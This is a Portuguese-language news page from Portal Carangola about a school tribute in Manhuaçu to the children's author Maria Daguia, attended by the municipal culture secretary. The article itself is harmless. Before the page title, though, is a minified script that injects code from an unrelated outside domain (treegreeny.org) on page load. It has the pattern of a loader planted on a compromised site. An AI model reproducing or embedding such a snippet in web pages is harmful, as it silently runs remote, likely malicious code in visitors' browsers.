;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhuaçu-Secretária de Cultura prestigia Homenagem a Escritora Carioca. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhuaçu-Secretária de Cultura prestigia Homenagem a Escritora Carioca.

A secretária de Cultura de Manhuaçu, Mariza Helena Klein, prestigiou na tarde desta terça-feira, 30, uma homenagem à escritora carioca, Maria Daguia, que se prepara para lançar uma coleção de contos infantis. O evento foi promovido pela Escola Estadual São Vicente de Paula, no Alfa Sul, em Manhuaçu. Na ocasião, os alunos apresentaram teatros, musicais e recitais com base em uma das obras da escritora, o livro “Quem Disse que o Sapo é Feio?”. Na ocasião, a Biblioteca Municipal de Manhuaçu, por meio da secretária, ganhou exemplares de duas obras da autora.
Maria Daguia é advogada, professora e roteirista de cinema. Apesar de ter sido internacionalmente premiada como roteirista, optou pela carreira de escritora, vocação descoberta, segundo ela, ainda na infância. “Escrevo desde pequena, mas com o tempo fui deixando, tomei outros rumos, mas só agora eu consegui ter coragem de fazer uma edição das minhas obras. Achava que eram apenas historinhas, mas o primeiro livro me rendeu um prêmio, vi que as pessoas gostam” – comentou Daguia, que fala sobre suas preferências e projetos futuros. “Gosto muito de escrever dramaturgias, é o meu formato da literatura predileto. Porque qualquer professor pode usá-lo para ensinar em sala de aula, na escola. Por isso estamos produzindo agora uma coleção, que conta inclusive com a história “Quem Disse que o Sapo é Feio?”.
A escritora, ao se deparar com as apresentações dos alunos da Escola São Vicente, não conteve as lágrimas e se disse grata pela recepção no município. “Eu descobri que sou emotiva, estou chorando porque vejo as crianças se interessando, vi todo o trabalho que a escola desenvolveu com base no livro do sapo, eles aprenderam a essência do livro, que é o de respeitar o diferente, não se importar com as aparências” – alegrou-se.
A secretária Mariza Klein enalteceu a iniciativa da escola. “É muito importante porque hoje em dia as crianças só ficam em joguinhos eletrônicos, celulares, enfim. A escola está de parabéns, o incentivo à leitura é muito importante desde a infância, porque não somos nada sem a leitura. E a Biblioteca ganhou dois exemplares da autora de livros lindos, trabalhos muito bem feitos, nós ficamos felizes e agradecemos a ela” – concluiu a secretária de Cultura.


Secretaria de Comunicação Social de Manhuaçu

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.